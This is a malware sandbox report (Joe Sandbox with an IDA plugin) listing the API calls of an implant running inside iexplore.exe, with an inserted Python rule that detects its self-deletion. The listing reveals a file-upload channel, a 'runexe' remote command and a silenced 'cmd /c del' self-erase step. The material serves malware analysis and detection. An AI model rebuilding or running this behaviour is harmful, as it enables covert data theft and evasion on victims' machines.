      • Part of subcall function 005190CF: memset.MSVCRT ref: 00519141
      • Part of subcall function 005190CF: memcpy.MSVCRT ref: 00519159
      • Part of subcall function 005190CF: ??3@YAXPAX@Z.MSVCRT ref: 005191AD
    • ??3@YAXPAX@Z.MSVCRT ref: 005130DB
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    • memset.MSVCRT ref: 00512D77
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • memset.MSVCRT ref: 00512DA7
    • ??2@YAPAXI@Z.MSVCRT ref: 00512DEA
    • ??2@YAPAXI@Z.MSVCRT ref: 00512E1B
    • ??2@YAPAXI@Z.MSVCRT ref: 00512E4C
    • ??3@YAXPAX@Z.MSVCRT ref: 00512F06
    • ??3@YAXPAX@Z.MSVCRT ref: 00512F12
    • ??3@YAXPAX@Z.MSVCRT ref: 00512F1E
    • ??2@YAPAXI@Z.MSVCRT ref: 00512F33
    • ??2@YAPAXI@Z.MSVCRT ref: 00512F4C
    • rand.MSVCRT ref: 00512F5A
      • Part of subcall function 005122D3: memset.MSVCRT ref: 00512330
      • Part of subcall function 005122D3: memset.MSVCRT ref: 0051235A
      • Part of subcall function 005122D3: rand.MSVCRT ref: 00512375
      • Part of subcall function 005122D3: ___swprintf_l.LIBCMT ref: 0051238F
    • __swprintf_c_l.LIBCMT ref: 00512F7B
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
      • Part of subcall function 0051AA2A: _errno.MSVCRT ref: 0051AA58
      • Part of subcall function 0051AA2A: _errno.MSVCRT ref: 0051AB07
    • ??3@YAXPAX@Z.MSVCRT ref: 00512FB1
    • rand.MSVCRT ref: 00512FBB
    • __swprintf_c_l.LIBCMT ref: 00512FD7
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • ??3@YAXPAX@Z.MSVCRT ref: 0051300D
    • rand.MSVCRT ref: 00513017
    • __swprintf_c_l.LIBCMT ref: 00513033
    • ??3@YAXPAX@Z.MSVCRT ref: 00513065
    • ??3@YAXPAX@Z.MSVCRT ref: 0051307D
    • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000002,A0000000), ref: 005130BB
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 005130C5
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00512458
    • rand.MSVCRT ref: 0051246D
    • rand.MSVCRT ref: 0051249B
    • rand.MSVCRT ref: 005124BF
    • rand.MSVCRT ref: 005124DB
    • rand.MSVCRT ref: 00512505
    • rand.MSVCRT ref: 0051253C
    • rand.MSVCRT ref: 0051257E
    • rand.MSVCRT ref: 005125B5
    • ___swprintf_l.LIBCMT ref: 005125E9
    • memset.MSVCRT ref: 0051263B
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • rand.MSVCRT ref: 00512650
      • Part of subcall function 005122D3: memset.MSVCRT ref: 00512330
      • Part of subcall function 005122D3: memset.MSVCRT ref: 0051235A
      • Part of subcall function 005122D3: rand.MSVCRT ref: 00512375
      • Part of subcall function 005122D3: ___swprintf_l.LIBCMT ref: 0051238F
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • rand.MSVCRT ref: 0051267F
    • rand.MSVCRT ref: 005126A4
    • ___swprintf_l.LIBCMT ref: 005126CA
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00516269
    • GetShortPathNameW.KERNEL32(?,?,00000104), ref: 00516280
    • GetEnvironmentVariableW.KERNEL32(COMSPEC,?,00000104), ref: 00516298
    • wcsstr.MSVCRT ref: 005162B3
    • memset.MSVCRT ref: 005162D4
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 005162E7
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00516309
    • lstrcpyW.KERNEL32(?,/c del ), ref: 0051631B
    • lstrcatW.KERNEL32(?,?), ref: 00516335
    • lstrcatW.KERNEL32(?, > nul), ref: 00516343
    • ShellExecuteExW.SHELL32(?), ref: 00516375
    • SetPriorityClass.KERNEL32(?,00000040), ref: 00516389
    • GetCurrentProcess.KERNEL32(00000100), ref: 00516390
    • SetPriorityClass.KERNEL32(00000000), ref: 00516397
    • GetCurrentThread.KERNEL32(0000000F), ref: 0051639B
    • SetThreadPriority.KERNEL32(00000000), ref: 005163A2
    • SHChangeNotify.SHELL32(00000004,00000005,?,00000000), ref: 005163B4
    • ExitProcess.KERNEL32 ref: 005163BB
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
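The routine listed above (GetModuleFileNameW, GetShortPathNameW, the COMSPEC lookup, lstrcpyW of "/c del ", lstrcatW of " > nul", ShellExecuteExW, then ExitProcess) is a self-deletion sequence: the implant has cmd.exe delete its own image by short (8.3) path once it has exited. The block below is an added detection example, not code from the Joe Sandbox report or from the analysed sample. It runs over constructed process-creation events in a hypothetical key=value export (the field names ParentImage, Image and CommandLine are assumed) and flags a cmd.exe "/c del <path> > nul" whose target plausibly is the parent's own executable. The 8.3 matching is a heuristic (stem prefix before "~" plus extension, same directory), not a reimplementation of GetShortPathNameW.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events, not taken from the report.
# Shape: key=value fields separated by '|', as a SIEM export of Sysmon
# Event ID 1 / Windows 4688 data might look (field names are assumed).
SAMPLE_EVENTS = [
    "ParentImage=C:\\Users\\user\\AppData\\Local\\Temp\\update.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=cmd /c del C:\\Users\\user\\AppData\\Local\\Temp\\UPDATE~1.EXE > nul",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=cmd /c del C:\\Users\\user\\Desktop\\notes.txt",
    "ParentImage=C:\\Windows\\System32\\svchost.exe"
    "|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe",
]

# "/c del <path> [> nul]" with optional quoting; group 1 is the deleted path,
# group 2 is present when output is silenced with "> nul".
DEL_RE = re.compile(r'/c\s+del\s+"?([^">]+?)"?\s*(>\s*nul)?\s*$', re.IGNORECASE)
# 8.3 short names as GetShortPathNameW returns them, e.g. UPDATE~1.EXE.
SHORT_RE = re.compile(r'^([^~]{1,6})~\d+(\.[^.]*)?$', re.IGNORECASE)


@dataclass
class Finding:
    parent: str
    target: str
    silenced: bool        # "> nul" present
    short_name: bool      # deleted path is an 8.3 short name
    targets_parent: bool  # deleted path plausibly is the parent's own image

    @property
    def verdict(self) -> str:
        return "self-delete" if self.targets_parent else "delete"


def parse_event(line: str) -> dict:
    return dict(field.split("=", 1) for field in line.split("|"))


def _same_file(target: str, parent_image: str) -> bool:
    """Heuristic 8.3 match: same directory, same extension, and the short
    stem's prefix (before '~') is a prefix of the parent's long stem."""
    t_dir, t_name = ntpath.split(target)
    p_dir, p_name = ntpath.split(parent_image)
    if t_dir.lower() != p_dir.lower():
        return False
    m = SHORT_RE.match(t_name)
    if not m:
        return t_name.lower() == p_name.lower()
    prefix, ext = m.group(1).lower(), (m.group(2) or "").lower()
    p_stem, p_ext = ntpath.splitext(p_name.lower())
    return p_ext == ext and p_stem.startswith(prefix)


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for a cmd.exe delete command, else None."""
    ev = parse_event(line)
    if ntpath.basename(ev.get("Image", "")).lower() != "cmd.exe":
        return None
    m = DEL_RE.search(ev.get("CommandLine", ""))
    if not m:
        return None
    target = m.group(1).strip()
    parent = ev.get("ParentImage", "")
    return Finding(
        parent=parent,
        target=target,
        silenced=m.group(2) is not None,
        short_name=SHORT_RE.match(ntpath.basename(target)) is not None,
        targets_parent=_same_file(target, parent),
    )


def scan(events: List[str]) -> List[Finding]:
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.verdict, f.parent, "->", f.target, "(silenced)" if f.silenced else "")
```

The short-name and same-directory correlation is what keeps the rule precise: a bare "cmd /c del" is common in installers and scripts, but a cmd.exe whose parent has just spawned it to delete the parent's own 8.3 path, silenced with "> nul", is the pattern the listed routine produces. On the host, the same event is usually followed within seconds by the parent's exit, which is a useful second condition in a SIEM.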
    APIs
    • memset.MSVCRT ref: 005159E7
    • ??2@YAPAXI@Z.MSVCRT ref: 00515A3A
    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00515A60
    • GetLastError.KERNEL32 ref: 00515A71
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00515A93
    • GetLastError.KERNEL32 ref: 00515AA4
    • memset.MSVCRT ref: 00515AB6
    • memcpy.MSVCRT ref: 00515AD1
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • GetLastError.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B02
    • GetTickCount.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B12
    • srand.MSVCRT ref: 00515B19
    • memset.MSVCRT ref: 00515B23
    • rand.MSVCRT ref: 00515B32
    • ReadFile.KERNEL32(?,0000000C,0000C60B,00000000,00000000), ref: 00515B5B
    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00515BBC
    • GetLastError.KERNEL32(00000000,-0000000C,000003F1,?), ref: 00515BE7
    • GetLastError.KERNEL32 ref: 00515B65
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00515C47: memset.MSVCRT ref: 00515C4B
      • Part of subcall function 00515C47: memcpy.MSVCRT ref: 00515C72
      • Part of subcall function 00515C47: GetLastError.KERNEL32(00000000,?,000003F2,?), ref: 00515CC0
    • ??3@YAXPAX@Z.MSVCRT ref: 00515C28
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
      • Part of subcall function 0051350A: memset.MSVCRT ref: 00513547
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 00513572
      • Part of subcall function 0051350A: memset.MSVCRT ref: 0051357C
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    Strings
    • Read Upload File Size Error! - %d, xrefs: 00515AAB
    • Send OP_UPLOAD_DATA Data Failed!, xrefs: 00515BED
    • open upload file error! - %d, xrefs: 00515A78
    • Read Upload File Error! - %d, xrefs: 00515B74
    • Send OP_UPLOAD_START Data Failed!, xrefs: 00515B08
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00511936
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000032,?,?,00000000), ref: 0051196F
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000019), ref: 00511984
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,0000001E), ref: 00511999
    • wcsstr.MSVCRT ref: 005119B5
    • wcsstr.MSVCRT ref: 005119CB
    • ___swprintf_l.LIBCMT ref: 005119E6
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,?,?,00000000), ref: 00511A18
    • WinHttpSetOption.WINHTTP(?,00001002,?,?,?,?,?,?,00000000), ref: 00511A81
    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00511A87
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpSetOption.WINHTTP(?,00001003,?,?,?,?,?,00000000), ref: 00511AC7
    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00511ACD
    • WinHttpSetOption.WINHTTP(?,00001002,?,?,?,?,?,00000000), ref: 00511B02
    • WinHttpSetOption.WINHTTP(?,00001003,?,?,?,?,?,00000000), ref: 00511B2F
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00511DDE
    • WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?), ref: 00511E18
    • memset.MSVCRT ref: 00511E87
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020), ref: 00511E9C
    • WinHttpGetProxyForUrl.WINHTTP(?,?,00000002,?), ref: 00511EB3
    • WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C), ref: 00511ED4
    • WinHttpCloseHandle.WINHTTP(?), ref: 00511EE8
    • ___swprintf_l.LIBCMT ref: 00511F39
      • Part of subcall function 0051AB18: _errno.MSVCRT ref: 0051AB45
      • Part of subcall function 0051AB18: _errno.MSVCRT ref: 0051ABDA
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    • GlobalFree.KERNEL32(?), ref: 00511F93
    • GlobalFree.KERNEL32(?), ref: 00511FA1
    • WinHttpOpen.WINHTTP(00000000,00000003,?,?,00000000), ref: 00511FAF
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 00511FE0
    • GetLastError.KERNEL32 ref: 00511FEC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00511301
      • Part of subcall function 00511124: memset.MSVCRT ref: 0051115A
      • Part of subcall function 00511124: RegEnumKeyW.ADVAPI32(80000003,00000000,?,00000104), ref: 0051117D
      • Part of subcall function 00511124: wcsncmp.MSVCRT(S-1-5-21,?,00000008), ref: 00511199
      • Part of subcall function 00511124: wcsstr.MSVCRT ref: 005111B1
      • Part of subcall function 00511124: memset.MSVCRT ref: 005111CF
      • Part of subcall function 00511124: RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?), ref: 00511206
    • RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,?,00000000), ref: 00511345
    • RegQueryValueExW.ADVAPI32(?,ProxyServer,00000000,00000000,?,?), ref: 00511370
    • RegCloseKey.ADVAPI32(?), ref: 00511378
    • ___swprintf_l.LIBCMT ref: 00511398
      • Part of subcall function 00519317: _errno.MSVCRT ref: 00519324
      • Part of subcall function 00519317: _wcslwr.MSVCRT ref: 00519356
    • wcsstr.MSVCRT ref: 005113B9
    • wcsstr.MSVCRT ref: 005113D3
    • wcsstr.MSVCRT ref: 005113EE
    • memset.MSVCRT ref: 00511412
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • ___swprintf_l.LIBCMT ref: 005114C2
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00515288
    • memset.MSVCRT ref: 00515295
    • ??2@YAPAXI@Z.MSVCRT ref: 005152A2
    • memset.MSVCRT ref: 005152B5
    • memcpy.MSVCRT ref: 005152C5
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
      • Part of subcall function 0051350A: memset.MSVCRT ref: 00513547
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 00513572
      • Part of subcall function 0051350A: memset.MSVCRT ref: 0051357C
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    • ??2@YAPAXI@Z.MSVCRT ref: 005152DE
    • memset.MSVCRT ref: 005152ED
    • strstr.MSVCRT ref: 0051532E
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 00515486: memset.MSVCRT ref: 005154C7
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 005154DA
      • Part of subcall function 00515486: strncmp.MSVCRT(?,runexe ,00000007,?,?,[%s],?,?,00000000,000001FF), ref: 005154E7
